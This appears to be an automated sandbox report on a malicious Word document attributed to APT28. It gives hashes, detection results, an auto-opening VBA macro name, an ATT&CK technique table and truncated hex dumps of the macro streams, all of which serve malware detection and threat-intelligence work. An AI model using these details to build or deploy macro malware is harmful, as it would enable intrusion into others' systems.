Windows
Analysis Report
RoYAd85faz.doc
Overview
General Information
Sample name: | RoYAd85faz.docrenamed because original name is a hash value |
Original sample name: | ab5685ebf439f61c554977df1e1cd0c3.doc |
Analysis ID: | 1590274 |
MD5: | ab5685ebf439f61c554977df1e1cd0c3 |
SHA1: | 715724904dfb62a68887fa3d2d6d391b32cbd7b1 |
SHA256: | fd78051817b5e2375c92d14588f9a4ba1adc92cc1564e55e6150ae350ed6c889 |
Tags: | docUAC-0063user-smica83 |
Infos: | |
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- WINWORD.EXE (PID: 7208 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\WINWO RD.EXE" /A utomation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
apt_susp_apt28_uac0063_malicious_doc_settings_xml | Detects some suspected APT28 document settings.xml | Sekoia.io |
|
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
System Summary |
---|
Source: | Matched rule: |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: documeNt_opEn |
Source: | OLE, VBA macro: |
Source: | Stream path 'VBA/ThisDocument' : |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: documeNt_opEn |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Word Document stream: |
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Stream path 'VBA/ThisDocument' : | |||
Source: | OLE, VBA macro: | Name: documeNt_opEn |
Source: | Process information queried: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | Windows Management Instrumentation | 32 Scripting | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | 1 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
44% | Virustotal | Browse | ||
34% | ReversingLabs | Script-Macro.Trojan.MacrosBomber | ||
100% | Avira | W2000M/AVI.Obfuscated.ldxun | ||
100% | Joe Sandbox ML |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | high | |
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | high |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1590274 |
Start date and time: | 2025-01-13 21:22:10 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 11m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | RoYAd85faz.docrenamed because original name is a hash value |
Original Sample Name: | ab5685ebf439f61c554977df1e1cd0c3.doc |
Detection: | MAL |
Classification: | mal80.expl.winDOC@2/2@0/0 |
Cookbook Comments: |
|
- Max analysis timeout: 600s exceeded, the analysis took too long
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, UserOOBEuserer.exe, Runtimeuserer.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 52.109.68.129, 199.232.214.172, 2.23.242.162, 104.208.16.89, 52.111.236.34, 52.111.236.35, 52.111.236.33, 52.111.236.32, 2.20.245.225, 2.20.245.216, 52.111.243.43, 52.111.243.40, 52.111.243.42, 52.111.243.41, 51.104.15.253, 13.107.246.45, 20.190.159.75, 52.149.20.212
- Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, onedscolprdcus11.centralus.cloudapp.azure.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprduks04.uksouth.cloudapp.azure.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.micr
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
s-part-0017.t-0009.t-msedge.net | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | DanaBot, Vidar | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
bg.microsoft.map.fastly.net | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, Xmrig, zgRAT | Browse |
| ||
Get hash | malicious | Remcos | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 663 |
Entropy (8bit): | 5.949125862393289 |
Encrypted: | false |
SSDEEP: | 12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF |
MD5: | ED3C1C40B68BA4F40DB15529D5443DEC |
SHA1: | 831AF99BB64A04617E0A42EA898756F9E0E0BCCA |
SHA-256: | 039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A |
SHA-512: | C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 4.771704076354825 |
Encrypted: | false |
SSDEEP: | 3:xdll9mgktFJMOHaJvUeEj+6wJCa8HD:nllIgktfMOadOhYC7D |
MD5: | 99943E1F954FF7CA96CDC276DE35F866 |
SHA1: | A9A301D0DFC41DB4BDD07A0EA8DA63674CE9C0EB |
SHA-256: | FA58B76081F9B63BC0F487980E813E3B40F6E2625B37BA98FDDD08D594D80DFE |
SHA-512: | 8C1DCFAC9F22B47AE31C431ADED2F78D51FF14F53A73D795AC5BFBCC17D78C87AB41E577E4969B0B5083853E18F47CD09B18329D356DF13E16331CF2AAAC5103 |
Malicious: | false |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 7.9711875335075595 |
TrID: |
|
File name: | RoYAd85faz.doc |
File size: | 42'814 bytes |
MD5: | ab5685ebf439f61c554977df1e1cd0c3 |
SHA1: | 715724904dfb62a68887fa3d2d6d391b32cbd7b1 |
SHA256: | fd78051817b5e2375c92d14588f9a4ba1adc92cc1564e55e6150ae350ed6c889 |
SHA512: | fc0eb6df2a25cb09f1431ac799b8d078e1dbc5e8ff664e06a5133175ff08a2068ac0bd185dc1e943dc7338ca5bc9f0de08473e117f213e5c3efb74c4bde40766 |
SSDEEP: | 768:K5LoMrd9SPM7SVTqVZDngfIZ6DZH9A5fO3cfgw92j6pZliNEfQy/1mJW3vad:K5E+7Y+rgfIIilO3o92juiI7/1vg |
TLSH: | 7D13F134FC882915FBEEE73653901A5AFB720952AB4020370A6792D557CB7F00FF5899 |
File Content Preview: | PK.........|8Y.Y.=............[Content_Types].xml...n.0.E.......D...(,g.......F..f+>@....;...-.3/m.X.{....Y.?...aL..Z.U.Q.S^.........(....y...c....O..}.T...Zl..7)....T...OZ.-...k.@..5.......#tTR....%.....z..C..8Q\.u.U- ..( >.;.+.J..Fa.k.6._.H.'a.........V |
Icon Hash: | 35e1cc889a8a8599 |
Document Type: | OpenXML |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Template: | |
Last Saved By: | |
Revion Number: | 36 |
Total Edit Time: | 0 |
Create Time: | 2023-09-28T05:41:00Z |
Last Saved Time: | 2023-10-09T04:26:00Z |
Number of Pages: | 3 |
Number of Words: | 825 |
Number of Characters: | 4703 |
Creating Application: | |
Security: | 12 |
Number of Lines: | 39 |
Number of Paragraphs: | 11 |
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0000 |
General | |
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 5719 |
Data ASCII: | . . . . . . . . . < . . . . . . b . . . T . . . b . . . . . . . . . . . . . . P . | . . . . . . . . . . . . . . . . . . . . . . . D ' G . . = + - G . . . H . . . . . . . . . . . . . . . . . . . . ? r . h G . V . ' . . . . . . . . . . . . . . . . . . . . . . . x . . . . ? r . h G . V . ' . D ' G . . = . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L |
Data Raw: | 01 16 03 00 06 00 01 00 00 3c 0a 00 00 e4 00 00 00 62 02 00 00 54 0b 00 00 62 0b 00 00 f2 11 00 00 03 00 00 00 01 00 00 00 50 0d 7c 15 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff a0 00 ff ff 00 00 9f a8 44 84 27 fd f3 47 9b c6 04 c4 ae f2 3d 9b f5 ea 2b f9 2d 8c 99 47 83 1c 88 0a ac a3 17 48 00 00 00 00 00 00 00 00 00 00 00 00 00 |
|
General | |
Stream Path: | PROJECT |
CLSID: | |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 369 |
Entropy: | 5.302139144655809 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 C 7 2 1 A 6 3 - D 3 8 3 - 4 0 3 A - 9 8 2 A - 0 5 A 3 0 E 7 6 2 5 B 7 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 4 9 A 6 C B 7 F C F 7 F C F 7 F C F 7 F C F " . . D P B = " A A A 8 3 6 9 1 0 A 9 2 0 A 9 2 0 A " . . G C = " 7 F 7 D E 3 C C 6 D 7 4 4 3 7 5 4 3 7 5 B C " . . . . [ H o s t E x t e n d e r I n f |
Data Raw: | 49 44 3d 22 7b 30 43 37 32 31 41 36 33 2d 44 33 38 33 2d 34 30 33 41 2d 39 38 32 41 2d 30 35 41 33 30 45 37 36 32 35 42 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 |
General | |
Stream Path: | PROJECTwm |
CLSID: | |
File Type: | data |
Stream Size: | 41 |
Entropy: | 3.0773844850752607 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00 |
General | |
Stream Path: | VBA/_VBA_PROJECT |
CLSID: | |
File Type: | data |
Stream Size: | 3235 |
Entropy: | 4.5261619436805 |
Base64 Encoded: | False |
Data ASCII: | a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
General | |
Stream Path: | VBA/__SRP_0 |
CLSID: | |
File Type: | data |
Stream Size: | 3509 |
Entropy: | 3.443885782340945 |
Base64 Encoded: | False |
Data ASCII: | K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ 6 . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 |
General | |
Stream Path: | VBA/__SRP_1 |
CLSID: | |
File Type: | data |
Stream Size: | 238 |
Entropy: | 2.11560831315699 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o b j A p p . . . . . . . . . . . . . . . . w s l . . . . . . . . . . . . . . . . n a m e d o c V . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00 |
General | |
Stream Path: | VBA/__SRP_2 |
CLSID: | |
File Type: | data |
Stream Size: | 3441 |
Entropy: | 3.681817370422095 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 2e 00 00 00 71 0a 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 81 0d 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | VBA/__SRP_3 |
CLSID: | |
File Type: | data |
Stream Size: | 420 |
Entropy: | 2.3674153773884705 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . 1 . . . . . . . . . . . O . P . 1 . . . . . . . . . . . . . . ` . . 9 . . . . . 1 . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . A . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . I . 8 . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . @ . . . . . . ` . . . * . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 a8 00 00 00 08 00 40 00 21 03 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 31 0e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
General | |
Stream Path: | VBA/dir |
CLSID: | |
File Type: | VAX-order 68K Blit (standalone) executable |
Stream Size: | 523 |
Entropy: | 6.209506507265267 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . ) . . . * . \\ C . . . . . . . \\ K . . . ] . r . . . & O . f f i c . l |
Data Raw: | 01 07 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e1 f9 fc 68 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 13, 2025 21:23:03.177326918 CET | 1.1.1.1 | 192.168.2.10 | 0xdd22 | No error (0) | s-part-0017.t-0009.t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 13, 2025 21:23:03.177326918 CET | 1.1.1.1 | 192.168.2.10 | 0xdd22 | No error (0) | 13.107.246.45 | A (IP address) | IN (0x0001) | false | ||
Jan 13, 2025 21:23:12.171849966 CET | 1.1.1.1 | 192.168.2.10 | 0xba6 | No error (0) | 199.232.214.172 | A (IP address) | IN (0x0001) | false | ||
